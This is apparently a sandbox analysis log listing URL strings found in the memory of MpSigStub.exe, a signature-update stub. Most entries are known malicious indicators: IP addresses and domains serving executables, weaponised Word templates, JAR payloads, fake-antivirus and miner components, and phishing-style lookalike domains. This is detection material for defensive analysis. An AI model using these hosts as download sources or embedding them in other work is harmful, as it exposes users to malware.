Source: MpSigStub.exe, 00000026.00000003.18327835238.00000138BDC5F000.00000004.00000001.sdmp	String found in binary or memory: http://209.62.108.213/
Source: MpSigStub.exe, 00000026.00000003.18327835238.00000138BDC5F000.00000004.00000001.sdmp	String found in binary or memory: http://209.62.108.220/
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	String found in binary or memory: http://20vp.cn/moyu/
Source: MpSigStub.exe, 00000026.00000003.18435819604.00000138BD5EA000.00000004.00000001.sdmp	String found in binary or memory: http://210302.top/
Source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	String found in binary or memory: http://212.109.196.67/gateway.php
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	String found in binary or memory: http://212.129.31.67
Source: MpSigStub.exe, 00000026.00000003.18333799062.00000138BDC1C000.00000004.00000001.sdmp	String found in binary or memory: http://212.192.241.203/xx/kl.exe
Source: MpSigStub.exe, 00000026.00000003.18333799062.00000138BDC1C000.00000004.00000001.sdmp	String found in binary or memory: http://212.192.241.203/xx/kl.exex
Source: MpSigStub.exe, 00000026.00000003.18350359042.00000138BE7B7000.00000004.00000001.sdmp	String found in binary or memory: http://212.237.58.208/0607/
Source: MpSigStub.exe, 00000026.00000003.18310511339.00000138BDE6F000.00000004.00000001.sdmp	String found in binary or memory: http://212.86.115.71/template.doc
Source: MpSigStub.exe, 00000026.00000003.18332517389.00000138BD29C000.00000004.00000001.sdmp	String found in binary or memory: http://213.159.117.134/index.php
Source: MpSigStub.exe, 00000026.00000003.18334733543.00000138BCF14000.00000004.00000001.sdmp, MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	String found in binary or memory: http://213.159.213.195/d.exe
Source: MpSigStub.exe, 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp	String found in binary or memory: http://216.170.114.73/
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://216.172.172.40/~agora546/cardoso/dilma.zip
Source: MpSigStub.exe, 00000026.00000003.18327835238.00000138BDC5F000.00000004.00000001.sdmp	String found in binary or memory: http://217.73.6
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: http://217.8.117.60/arty.exe
Source: MpSigStub.exe, 00000026.00000003.18435819604.00000138BD5EA000.00000004.00000001.sdmp	String found in binary or memory: http://217.8.117.63/
Source: MpSigStub.exe, 00000026.00000003.18355537254.00000138BCF99000.00000004.00000001.sdmp	String found in binary or memory: http://218.204.253.145/setup.exe
Source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp	String found in binary or memory: http://22112017.flashplayeron.com
Source: MpSigStub.exe, 00000026.00000003.18432036544.00000138BD146000.00000004.00000001.sdmp	String found in binary or memory: http://223.244.225.3:
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: http://22y456.com/
Source: MpSigStub.exe, 00000026.00000003.18348616803.00000138BCC0C000.00000004.00000001.sdmp	String found in binary or memory: http://23.244.141.185/cgi-bin
Source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp	String found in binary or memory: http://23.249.163.163/qwerty.exe
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://23.95.122.24/..-.-.-.-.-.-.-.-.-.-.-._---------_-------_-------....-.-/
Source: MpSigStub.exe, 00000026.00000003.18291478941.00000138BCE0D000.00000004.00000001.sdmp	String found in binary or memory: http://23.95.122.25/..-.-................-.....-------------/
Source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp	String found in binary or memory: http://23.95.122.25/..-.-................-.....-------------/.......................................
Source: MpSigStub.exe, 00000026.00000003.18298692792.00000138BDFE8000.00000004.00000001.sdmp	String found in binary or memory: http://23.95.122.31/concord/
Source: MpSigStub.exe, 00000026.00000003.18353014898.00000138BD7B9000.00000004.00000001.sdmp	String found in binary or memory: http://23.95.231.200/images/footer1.dll
Source: MpSigStub.exe, 00000026.00000003.18290273099.00000138BE733000.00000004.00000001.sdmp	String found in binary or memory: http://24-7-search.com/
Source: MpSigStub.exe, 00000026.00000003.18322318413.00000138BD5A8000.00000004.00000001.sdmp	String found in binary or memory: http://2fa.com-token-auth.com/
Source: MpSigStub.exe, 00000026.00000003.18355537254.00000138BCF99000.00000004.00000001.sdmp	String found in binary or memory: http://2ndrequest.me/
Source: MpSigStub.exe, 00000026.00000003.18332386315.00000138BD293000.00000004.00000001.sdmp	String found in binary or memory: http://2udating.com
Source: MpSigStub.exe, 00000026.00000003.18332386315.00000138BD293000.00000004.00000001.sdmp	String found in binary or memory: http://2udating.net
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://3.0.242.71/wp-content/2_ur/
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	String found in binary or memory: http://31.192.209.
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	String found in binary or memory: http://31.192.210.
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	String found in binary or memory: http://31.192.211.
Source: MpSigStub.exe, 00000026.00000003.18333799062.00000138BDC1C000.00000004.00000001.sdmp	String found in binary or memory: http://31.210.20.225:8080/server.exe")
Source: MpSigStub.exe, 00000026.00000003.18326445165.00000138BE3D9000.00000004.00000001.sdmp	String found in binary or memory: http://3117488091/lib/jquery-3.2.1.min.js
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://3286924353/jb.jar
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://32player.com
Source: MpSigStub.exe, 00000026.00000003.18297254258.00000138BD45F000.00000004.00000001.sdmp	String found in binary or memory: http://365well.org/zload/get_exe.php?l=
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	String found in binary or memory: http://37.10.71.35/scan001-jpeg.jar
Source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp	String found in binary or memory: http://37.120.206.70/dom/d.wbk
Source: MpSigStub.exe, 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp	String found in binary or memory: http://37.120.206.70/mend/
Source: MpSigStub.exe, 00000026.00000003.18325199016.00000138BEA60000.00000004.00000001.sdmp	String found in binary or memory: http://37.120.206.70/mend/m.wbk
Source: MpSigStub.exe, 00000026.00000003.18291478941.00000138BCE0D000.00000004.00000001.sdmp	String found in binary or memory: http://37.187.248.215/promo.php
Source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	String found in binary or memory: http://3b3.org/
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://3dcpw.net/house/404.htm
Source: MpSigStub.exe, 00000026.00000003.18302973741.00000138BE4E1000.00000004.00000001.sdmp	String found in binary or memory: http://3dplayful.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18304770549.00000138BDA4F000.00000004.00000001.sdmp	String found in binary or memory: http://3gool.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18291478941.00000138BCE0D000.00000004.00000001.sdmp	String found in binary or memory: http://3novices.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18291478941.00000138BCE0D000.00000004.00000001.sdmp	String found in binary or memory: http://3rbfilm.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	String found in binary or memory: http://3s249.s249327.96.lt/mss2ro37qtl3cbw9vo0lk2bx8vv7jmx2mlesim9ddw11fem3sjp3ijuoufk/mss.php
Source: MpSigStub.exe, 00000026.00000003.18350786721.00000138BD66E000.00000004.00000001.sdmp	String found in binary or memory: http://3z.fi/evil1/PMwGWkmh
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: http://41.59.0.100/intranet
Source: MpSigStub.exe, 00000026.00000003.18326492976.00000138BE3E0000.00000004.00000001.sdmp	String found in binary or memory: http://45.12.32.58/
Source: MpSigStub.exe, 00000026.00000003.18322967354.00000138BCA81000.00000004.00000001.sdmp	String found in binary or memory: http://45.12.32.87/
Source: MpSigStub.exe, 00000026.00000003.18322967354.00000138BCA81000.00000004.00000001.sdmp	String found in binary or memory: http://45.12.32.9/
Source: MpSigStub.exe, 00000026.00000003.18311417254.00000138BCA04000.00000004.00000001.sdmp	String found in binary or memory: http://45.138.157.216/44313
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	String found in binary or memory: http://45.138.172.158
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://45.139.236.86/scan.wbk?raw=true
Source: MpSigStub.exe, 00000026.00000003.18347347691.00000138BEAA2000.00000004.00000001.sdmp	String found in binary or memory: http://45.145.185.85xmr=network001sys=sysrv002#killoldfilespkill-9
Source: MpSigStub.exe, 00000026.00000003.18310205090.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://45.55.29.117/download/nsis/pb_nsissetup.exe
Source: MpSigStub.exe, 00000026.00000003.18314933274.00000138BCB04000.00000004.00000001.sdmp	String found in binary or memory: http://45.63.107.19/PhilaeAp05.cpl
Source: MpSigStub.exe, 00000026.00000003.18355154038.00000138BCFDB000.00000004.00000001.sdmp	String found in binary or memory: http://45.67.230.159/
Source: MpSigStub.exe, 00000026.00000003.18326492976.00000138BE3E0000.00000004.00000001.sdmp	String found in binary or memory: http://45.77.255.68/5.sctscrobj.dll
Source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	String found in binary or memory: http://45.84.1.195/
Source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	String found in binary or memory: http://45.85.90.14/i88/Kpbehmu.ex
Source: MpSigStub.exe, 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp	String found in binary or memory: http://45.89.127.230/images/yellowtank.png-o%appdata%
Source: MpSigStub.exe, 00000026.00000003.18351149084.00000138BD6B0000.00000004.00000001.sdmp	String found in binary or memory: http://45.9.148.35/chimaera/bin/rpm_deb_apk/x86_64/openssh.rpm
Source: MpSigStub.exe, 00000026.00000003.18297254258.00000138BD45F000.00000004.00000001.sdmp	String found in binary or memory: http://45.9.148.35/chimaera/sh/
Source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	String found in binary or memory: http://45.90.59.77/
Source: MpSigStub.exe, 00000026.00000003.18327835238.00000138BDC5F000.00000004.00000001.sdmp	String found in binary or memory: http://45.90.59.97/44313
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://46.101.202.232/wp-includes/mx_ib/
Source: MpSigStub.exe, 00000026.00000003.18436125478.00000138BD62B000.00000004.00000001.sdmp	String found in binary or memory: http://46.183.220.123/wxx.doc
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://46.243.136.238/
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://46.30.43.8/gw.exe
Source: MpSigStub.exe, 00000026.00000003.18437644222.00000138BDCE2000.00000004.00000001.sdmp	String found in binary or memory: http://47.89.187.54
Source: MpSigStub.exe, 00000026.00000003.18332386315.00000138BD293000.00000004.00000001.sdmp	String found in binary or memory: http://4udating.net
Source: MpSigStub.exe, 00000026.00000003.18436433001.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://5.1.83.182:8000/cgi-bin/hello.py?
Source: MpSigStub.exe, 00000026.00000003.18331150591.00000138BD6B1000.00000004.00000001.sdmp	String found in binary or memory: http://5.135.73.116/win/document_0120200.doc
Source: MpSigStub.exe, 00000026.00000003.18436125478.00000138BD62B000.00000004.00000001.sdmp	String found in binary or memory: http://5.152.203.117/tues/invoice.doc
Source: MpSigStub.exe, 00000026.00000003.18327835238.00000138BDC5F000.00000004.00000001.sdmp	String found in binary or memory: http://5.34.180.57/44313
Source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp	String found in binary or memory: http://5.39.217.221/win/
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	String found in binary or memory: http://50.63.128.
Source: MpSigStub.exe, 00000026.00000003.18306564142.00000138BD4E3000.00000004.00000001.sdmp	String found in binary or memory: http://51.254.164.244/
Source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	String found in binary or memory: http://51.255.155.1/pages/filecloud/5e2d7b130cf4feb03023e580b3432fa9d71d7838.exe
Source: MpSigStub.exe, 00000026.00000003.18436125478.00000138BD62B000.00000004.00000001.sdmp	String found in binary or memory: http://51.75.142.21/
Source: MpSigStub.exe, 00000026.00000003.18314933274.00000138BCB04000.00000004.00000001.sdmp	String found in binary or memory: http://51.81.114.167:
Source: MpSigStub.exe, 00000026.00000003.18309026309.00000138BD4A8000.00000004.00000001.sdmp	String found in binary or memory: http://513389.cn/
Source: MpSigStub.exe, 00000026.00000003.18349576485.00000138BE313000.00000004.00000001.sdmp	String found in binary or memory: http://54.214.246.97/log/SilentUpdater7/install
Source: MpSigStub.exe, 00000026.00000003.18304476785.00000138BE2D0000.00000004.00000001.sdmp	String found in binary or memory: http://54.237.176.95/z2.php?a=%s&b=%d&c=%d&d=%d&e=%d&f=%d&g=%s&h=%d&i=%d&z=%d&y=%d
Source: MpSigStub.exe, 00000026.00000003.18304476785.00000138BE2D0000.00000004.00000001.sdmp	String found in binary or memory: http://54.237.176.95/z2.php?a=%s&b=%d&c=%d&d=%d&e=%d&f=%d&g=%s&h=%d&i=%d&z=%d&y=%dx
Source: MpSigStub.exe, 00000026.00000003.18297254258.00000138BD45F000.00000004.00000001.sdmp	String found in binary or memory: http://58.65.235.3/up/get_exa.php?l=
Source: MpSigStub.exe, 00000026.00000003.18327835238.00000138BDC5F000.00000004.00000001.sdmp	String found in binary or memory: http://58.65.239.124/
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	String found in binary or memory: http://58.65.239.82
Source: MpSigStub.exe, 00000026.00000003.18303628807.00000138BE85F000.00000004.00000001.sdmp	String found in binary or memory: http://5starvideos.com/main/
Source: MpSigStub.exe, 00000026.00000003.18303628807.00000138BE85F000.00000004.00000001.sdmp	String found in binary or memory: http://5starvideos.com/main/K
Source: MpSigStub.exe, 00000026.00000003.18303628807.00000138BE85F000.00000004.00000001.sdmp	String found in binary or memory: http://5starvideos.com/main/K5
Source: MpSigStub.exe, 00000026.00000003.18431158407.00000138BE311000.00000004.00000001.sdmp	String found in binary or memory: http://5u2mr.com/unbbmevd/d76.php?l=oev4.cab
Source: MpSigStub.exe, 00000026.00000003.18305972562.00000138BCED3000.00000004.00000001.sdmp	String found in binary or memory: http://61.135.159.183/installer/sobar.exe
Source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp	String found in binary or memory: http://61.160.222.11:
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	String found in binary or memory: http://61.19.253.
Source: MpSigStub.exe, 00000026.00000003.18334733543.00000138BCF14000.00000004.00000001.sdmp	String found in binary or memory: http://62.109.31.216/
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	String found in binary or memory: http://62.210.214.
Source: MpSigStub.exe, 00000026.00000003.18327835238.00000138BDC5F000.00000004.00000001.sdmp	String found in binary or memory: http://63.219.176.248/
Source: MpSigStub.exe, 00000026.00000003.18327835238.00000138BDC5F000.00000004.00000001.sdmp	String found in binary or memory: http://63.219.178.162/
Source: MpSigStub.exe, 00000026.00000003.18337502514.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://63.219.178.162/CFL/
Source: MpSigStub.exe, 00000026.00000003.18337502514.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://63.219.178.162/EX/
Source: MpSigStub.exe, 00000026.00000003.18337502514.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://63.219.178.162/EX/x
Source: MpSigStub.exe, 00000026.00000003.18337502514.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://63.219.178.162/K/F
Source: MpSigStub.exe, 00000026.00000003.18337502514.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://63.219.178.162/NL2/?w=
Source: MpSigStub.exe, 00000026.00000003.18339794865.00000138BD272000.00000004.00000001.sdmp	String found in binary or memory: http://64.156.31.
Source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp	String found in binary or memory: http://64.28.184.4/js.php?id=2011
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: http://65.181.112.251/coke/w8.txt
Source: MpSigStub.exe, 00000026.00000003.18309026309.00000138BD4A8000.00000004.00000001.sdmp	String found in binary or memory: http://65.243.103.
Source: MpSigStub.exe, 00000026.00000003.18303628807.00000138BE85F000.00000004.00000001.sdmp	String found in binary or memory: http://65.243.103.58/trafc-2/rfe.php
Source: MpSigStub.exe, 00000026.00000003.18303628807.00000138BE85F000.00000004.00000001.sdmp	String found in binary or memory: http://65.243.103.58/trafc-2/rfe.phpg
Source: MpSigStub.exe, 00000026.00000003.18297254258.00000138BD45F000.00000004.00000001.sdmp	String found in binary or memory: http://65.243.103.80/80
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	String found in binary or memory: http://66.148.74.7/zu2/zc.php
Source: MpSigStub.exe, 00000026.00000003.18327835238.00000138BDC5F000.00000004.00000001.sdmp	String found in binary or memory: http://66.40.9.246/binaries
Source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	String found in binary or memory: http://66.98.138.92/PH/
Source: MpSigStub.exe, 00000026.00000003.18347347691.00000138BEAA2000.00000004.00000001.sdmp	String found in binary or memory: http://67.15.
Source: MpSigStub.exe, 00000026.00000003.18318003902.00000138BD399000.00000004.00000001.sdmp	String found in binary or memory: http://67.18.111.82:8088
Source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp	String found in binary or memory: http://67.210.122.222/~turks/lego/
Source: MpSigStub.exe, 00000026.00000003.18299088622.00000138BDEB1000.00000004.00000001.sdmp	String found in binary or memory: http://68.178.225.162
Source: MpSigStub.exe, 00000026.00000003.18309026309.00000138BD4A8000.00000004.00000001.sdmp	String found in binary or memory: http://69.31.80.
Source: MpSigStub.exe, 00000026.00000003.18355537254.00000138BCF99000.00000004.00000001.sdmp	String found in binary or memory: http://69.31.84.223/
Source: MpSigStub.exe, 00000026.00000003.18327500976.00000138BDB98000.00000004.00000001.sdmp	String found in binary or memory: http://69.50.164.11/v1/mh.php?pid=%s&cid=%s&p=%s&t=%s&vh=%i&vt=%i
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	String found in binary or memory: http://69.64.36.110/msn.php?email=
Source: MpSigStub.exe, 00000026.00000003.18317408849.00000138BDA0D000.00000004.00000001.sdmp	String found in binary or memory: http://6tof.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18292462058.00000138BDF8A000.00000004.00000001.sdmp	String found in binary or memory: http://7-.j-z-0-3-0-u-u-x-f-1l-3-l-h-w-b-q-z-u-5-n-l-l-m-s-5-v-s-z-g.info
Source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp	String found in binary or memory: http://70.38.40.185
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://72.29.80.113/~nossacai/
Source: MpSigStub.exe, 00000026.00000003.18432036544.00000138BD146000.00000004.00000001.sdmp	String found in binary or memory: http://74.cz
Source: MpSigStub.exe, 00000026.00000003.18317408849.00000138BDA0D000.00000004.00000001.sdmp	String found in binary or memory: http://76h1.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18326445165.00000138BE3D9000.00000004.00000001.sdmp	String found in binary or memory: http://77.81.225.138/carnaval2017.zip
Source: MpSigStub.exe, 00000026.00000003.18436125478.00000138BD62B000.00000004.00000001.sdmp	String found in binary or memory: http://78.128.92.108/document/word.doc
Source: MpSigStub.exe, 00000026.00000003.18325199016.00000138BEA60000.00000004.00000001.sdmp	String found in binary or memory: http://78.128.92.26/
Source: MpSigStub.exe, 00000026.00000003.18344712542.00000138BD9CA000.00000004.00000001.sdmp	String found in binary or memory: http://78.157.143.251
Source: MpSigStub.exe, 00000026.00000003.18322967354.00000138BCA81000.00000004.00000001.sdmp	String found in binary or memory: http://78.24.220.183/
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	String found in binary or memory: http://78.soupay.com/plugin/g.asp?id=
Source: MpSigStub.exe, 00000026.00000003.18438856533.00000138BDFB8000.00000004.00000001.sdmp	String found in binary or memory: http://79.110.52.186/bayo/b.wbk
Source: MpSigStub.exe, 00000026.00000003.18325199016.00000138BEA60000.00000004.00000001.sdmp	String found in binary or memory: http://79.110.52.186/fide/f.wbk
Source: MpSigStub.exe, 00000026.00000003.18325199016.00000138BEA60000.00000004.00000001.sdmp	String found in binary or memory: http://79.110.52.186/naki/n.wbk
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	String found in binary or memory: http://79.125.7.221/
Source: MpSigStub.exe, 00000026.00000003.18311417254.00000138BCA04000.00000004.00000001.sdmp	String found in binary or memory: http://81.16.141.208/q37kkp
Source: MpSigStub.exe, 00000026.00000003.18429655870.00000138BE6F0000.00000004.00000001.sdmp	String found in binary or memory: http://81.177.26.20/ayayay
Source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	String found in binary or memory: http://82.118.23.186/
Source: MpSigStub.exe, 00000026.00000003.18326492976.00000138BE3E0000.00000004.00000001.sdmp	String found in binary or memory: http://82.98.119.68/wp-admin/app/alim.doc
Source: MpSigStub.exe, 00000026.00000003.18331150591.00000138BD6B1000.00000004.00000001.sdmp	String found in binary or memory: http://82.98.119.68/wp-admin/app/updates.doc
Source: MpSigStub.exe, 00000026.00000003.18309026309.00000138BD4A8000.00000004.00000001.sdmp	String found in binary or memory: http://82.98.235.
Source: MpSigStub.exe, 00000026.00000003.18297254258.00000138BD45F000.00000004.00000001.sdmp	String found in binary or memory: http://82.98.235.63/cgi-bin/check/autoaff3
Source: MpSigStub.exe, 00000026.00000003.18292669743.00000138BD567000.00000004.00000001.sdmp	String found in binary or memory: http://83.136.232.110/44285
Source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp	String found in binary or memory: http://83.149.75.54/cgi-bin
Source: MpSigStub.exe, 00000026.00000003.18341846775.00000138BCF56000.00000004.00000001.sdmp	String found in binary or memory: http://83.166.242.164/desktop-st7lsde/
Source: MpSigStub.exe, 00000026.00000003.18341846775.00000138BCF56000.00000004.00000001.sdmp	String found in binary or memory: http://83.166.242.164/desktop-st7lsde/nay.dot
Source: MpSigStub.exe, 00000026.00000003.18341846775.00000138BCF56000.00000004.00000001.sdmp	String found in binary or memory: http://83.166.246.59/sgz2/rejoice/lowered.dot
Source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp	String found in binary or memory: http://85.17.3.151/cgi-bin
Source: MpSigStub.exe, 00000026.00000003.18318003902.00000138BD399000.00000004.00000001.sdmp	String found in binary or memory: http://85.17.93.189/iddq/m
Source: MpSigStub.exe, 00000026.00000003.18333799062.00000138BDC1C000.00000004.00000001.sdmp	String found in binary or memory: http://85.234.191.170/inst.php?id=
Source: MpSigStub.exe, 00000026.00000003.18333799062.00000138BDC1C000.00000004.00000001.sdmp	String found in binary or memory: http://85.234.191.a7
Source: MpSigStub.exe, 00000026.00000003.18339021040.00000138BE6AF000.00000004.00000001.sdmp	String found in binary or memory: http://85.255.11
Source: MpSigStub.exe, 00000026.00000003.18339021040.00000138BE6AF000.00000004.00000001.sdmp	String found in binary or memory: http://85.255.11http://ad.eltext.comhttp://ad.tuzikmedia.biz.rsrc
Source: MpSigStub.exe, 00000026.00000003.18327835238.00000138BDC5F000.00000004.00000001.sdmp	String found in binary or memory: http://88.208.17.127/
Source: MpSigStub.exe, 00000026.00000003.18436433001.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://888888.2288.org/Monitor_INI
Source: MpSigStub.exe, 00000026.00000003.18436433001.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://88888888.7766.org/ExeIni
Source: MpSigStub.exe, 00000026.00000003.18306892097.00000138BD524000.00000004.00000001.sdmp	String found in binary or memory: http://89.188.16.
Source: MpSigStub.exe, 00000026.00000003.18297254258.00000138BD45F000.00000004.00000001.sdmp	String found in binary or memory: http://89.188.16.18/
Source: MpSigStub.exe, 00000026.00000003.18436125478.00000138BD62B000.00000004.00000001.sdmp	String found in binary or memory: http://89.248.161.2/yourdoc.doc
Source: MpSigStub.exe, 00000026.00000003.18299675099.00000138BE03D000.00000004.00000001.sdmp	String found in binary or memory: http://89.45.14.196/p1/server
Source: MpSigStub.exe, 00000026.00000003.18302973741.00000138BE4E1000.00000004.00000001.sdmp	String found in binary or memory: http://8nasrcity.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	String found in binary or memory: http://91.142.64.91/quantserve/quant.js
Source: MpSigStub.exe, 00000026.00000003.18435519768.00000138BD45D000.00000004.00000001.sdmp	String found in binary or memory: http://91.227.18.58/sqwere/casma.gif
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	String found in binary or memory: http://92.222.7.
Source: MpSigStub.exe, 00000026.00000003.18326492976.00000138BE3E0000.00000004.00000001.sdmp	String found in binary or memory: http://92.38.135.46/43cfqysryip51zzq.php
Source: MpSigStub.exe, 00000026.00000003.18297254258.00000138BD45F000.00000004.00000001.sdmp	String found in binary or memory: http://92.63.197.106/c.exe
Source: MpSigStub.exe, 00000026.00000003.18436125478.00000138BD62B000.00000004.00000001.sdmp	String found in binary or memory: http://92.63.197.153/good.exe
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp, MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	String found in binary or memory: http://92.63.197.60/c.exe
Source: MpSigStub.exe, 00000026.00000003.18312208260.00000138BDE5C000.00000004.00000001.sdmp	String found in binary or memory: http://93.189.43.3/kinsingchmod
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	String found in binary or memory: http://94.102.14.
Source: MpSigStub.exe, 00000026.00000003.18303554710.00000138BE851000.00000004.00000001.sdmp	String found in binary or memory: http://94.103.85.236/ds/11.gif
Source: MpSigStub.exe, 00000026.00000003.18435819604.00000138BD5EA000.00000004.00000001.sdmp	String found in binary or memory: http://94.156.174.7/up/a1a.htmyx_h=
Source: MpSigStub.exe, 00000026.00000003.18334733543.00000138BCF14000.00000004.00000001.sdmp	String found in binary or memory: http://94.23.210.144/promo/promo.php
Source: MpSigStub.exe, 00000026.00000003.18296951613.00000138BE396000.00000004.00000001.sdmp	String found in binary or memory: http://94.23.39.156/fakeav/files.php?jsoncallback=?
Source: MpSigStub.exe, 00000026.00000003.18295324067.00000138BE20A000.00000004.00000001.sdmp	String found in binary or memory: http://94.75.
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	String found in binary or memory: http://95.173.183.
Source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp	String found in binary or memory: http://95.46.99.199/template.doc
Source: MpSigStub.exe, 00000026.00000003.18435217053.00000138BD41C000.00000004.00000001.sdmp	String found in binary or memory: http://980.jlbtcg.cn
Source: MpSigStub.exe, 00000026.00000003.18323600754.00000138BDB57000.00000004.00000001.sdmp	String found in binary or memory: http://9ifz.org/2345
Source: MpSigStub.exe, 00000026.00000003.18431158407.00000138BE311000.00000004.00000001.sdmp	String found in binary or memory: http://9nag0.com/unbbmevd/d76.php?l=oev2.cab
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: http://9o0gle.com/
Source: MpSigStub.exe, 00000026.00000003.18312795035.00000138BEAE5000.00000004.00000001.sdmp	String found in binary or memory: http://Andrei512.narod.ru
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	String found in binary or memory: http://Motobit.cz
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	String found in binary or memory: http://Viewpics.DYNU.com/views.php?dir=pics&section=hot&clip=14
